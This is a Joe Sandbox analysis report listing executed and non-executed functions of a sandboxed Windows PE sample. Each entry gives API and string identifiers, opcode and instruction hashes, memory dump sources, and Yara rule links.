                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocFreememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3063399779-0
                                                                                                            • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                                                                            • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                                                                            • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                                                                            • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                                                                            Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeapValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2362848668-0
                                                                                                            • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                                                                            • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                                                                            • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                                                                            • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                                                                            Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1642312469-0
                                                                                                            • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                                                                            • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                                                                            • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                                                                            • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                                                                            Function 00000001400122F0 Relevance: 2.5, APIs: 2, Instructions: 25memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeapwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 746647629-0
                                                                                                            • Opcode ID: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
                                                                                                            • Instruction ID: 39c3555cb5e633ae9f9a5314a67da5fdcb628df671bb12a0019ba56a0bb7f9c1
                                                                                                            • Opcode Fuzzy Hash: 81789514eeed516ebf87f83d925e2a503bc1185eff46d0294f6b5050b1c1ed04
                                                                                                            • Instruction Fuzzy Hash: 3DF0E276608A8082D621DB1AE44134AA7B1F3C9BC4F104125EBCC83B69CF3EC9518A00
                                                                                                            Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                                                                            • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                                                                            • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                                                                            • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                                                                            Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3978063606-0
                                                                                                            • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                            • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                                                                            • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                                                                            • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                                                                            Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 1611563598-0
                                                                                                            • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                            • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                                                                            • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                                                                            • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                                                                            Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 10892065-0
                                                                                                            • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                            • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                                                                            • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                                                                            • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                                                                            Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHandlerRemoveVectored
                                                                                                            • String ID:
                                                                                                            • API String ID: 1340492425-0
                                                                                                            • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                            • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                                                                            • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                                                                            • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

                                                                                                            Non-executed Functions

                                                                                                            Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                                                                            • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                                                                            • API String ID: 9748049-1690119102
                                                                                                            • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                                                                            • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                                                                            • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                                                                            • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                                                                            Function 0000000140013798 Relevance: 12.0, Strings: 9, Instructions: 740COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                            • API String ID: 0-2665694366
                                                                                                            • Opcode ID: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                                                                            • Instruction ID: 94762fe19e52a1e76ee8dc23a2b1d827446cec64643fb03410c83a9544901dbd
                                                                                                            • Opcode Fuzzy Hash: 67ed6bfcabc3f0c0ebd438a55ac1e776d09ba86ed25bc9a2d2f07d297f59d07e
                                                                                                            • Instruction Fuzzy Hash: 9452D2726106608BE72ACF26D49CBED37E5F3487C4F414129EB868B7A4E77AC845CB50
                                                                                                            Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                                                                            • API String ID: 0-4074041902
                                                                                                            • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                                                                            • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                                                                            • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                                                                            • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                                                                            Function 0000000140015F30 Relevance: 4.1, Strings: 3, Instructions: 374COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                                                            • API String ID: 0-3255898291
                                                                                                            • Opcode ID: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                                                                            • Instruction ID: 36a5a67a6b198623208e03fcdf44eed6b32d9d42851390dc4c2f02830f1e2460
                                                                                                            • Opcode Fuzzy Hash: 1e45c625052aaed0026cb6e9d9d155a9553cb1c11e4068b20b0b3ed65267e05e
                                                                                                            • Instruction Fuzzy Hash: 17D11733618AD08BD71A8F7AD8443AD7BA1F3597C1F048116FB968B7D1DA3ACA49C700
                                                                                                            Function 0000000140012E97 Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: incorrect header check$invalid window size$unknown compression method
                                                                                                            • API String ID: 0-1186847913
                                                                                                            • Opcode ID: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                                                                            • Instruction ID: 2adac2097dd96be31fc3b588942c2867655d7ffa7f23b7c0480b06af30ac11af
                                                                                                            • Opcode Fuzzy Hash: 52ed7635aeae8ff526247262ac50360336e7a020413c2717a67c94432d795328
                                                                                                            • Instruction Fuzzy Hash: 35917F726042008BFB6ACF26D58879D3BE5F3083D4F154129EB598BBB0D73AD9A1CB40
                                                                                                            Function 0000000140013507 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $ $invalid block type
                                                                                                            • API String ID: 0-2056396358
                                                                                                            • Opcode ID: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                                                                            • Instruction ID: a7252faa3c80580baed472012d71d0b62e6cbeab3839f0b874d886ed0dadd07f
                                                                                                            • Opcode Fuzzy Hash: 6a1db03687435ebb1430cf625d2d53183cb1bdca78445c29a8775c11b27300e0
                                                                                                            • Instruction Fuzzy Hash: 6F6190B3610B508BE726CF26D9883AD37A0F3193D4F554125EB568BBE0D77AD590CB40
                                                                                                            Function 000000014000EA48 Relevance: 2.8, APIs: 1, Instructions: 1540COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2162964266-0
                                                                                                            • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                                                                            • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                                                                                            • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                                                                                            • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                                                                                            Function 0000000140010210 Relevance: .7, Instructions: 676COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                                                                            • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                                                                                            • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                                                                                            • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                                                                                            Function 0000000140014E90 Relevance: .2, Instructions: 216COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                                                                            • Instruction ID: 127c8a3eefbec1cf179e73712b468f180dd3e669bf73dd13b43b77d2e925ff5f
                                                                                                            • Opcode Fuzzy Hash: cf726ec6ae42089ceab56936488a5fdcc83c03c51bcf0dd9a340e541980c14d4
                                                                                                            • Instruction Fuzzy Hash: F8818E733301749BE7668A2EA514BE93690F3693CEFC16114FB8487B85CA3DB921CB40
                                                                                                            Function 0000000140014E80 Relevance: .2, Instructions: 194COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                                                                            • Instruction ID: 09e49e300f3b48ce8064fe567ba8ae1e18cb52cb4f612ff9abff1437f032a71a
                                                                                                            • Opcode Fuzzy Hash: 5c5c31c79345c80cbc84505c9318a96aa45c2c473e25a63ddceb6769520a1643
                                                                                                            • Instruction Fuzzy Hash: D5712BB33301749BEB658B1E9514BA93390F36A389FC16105FB855BB85CA3EB921CB50
                                                                                                            Function 0000000140015220 Relevance: .1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
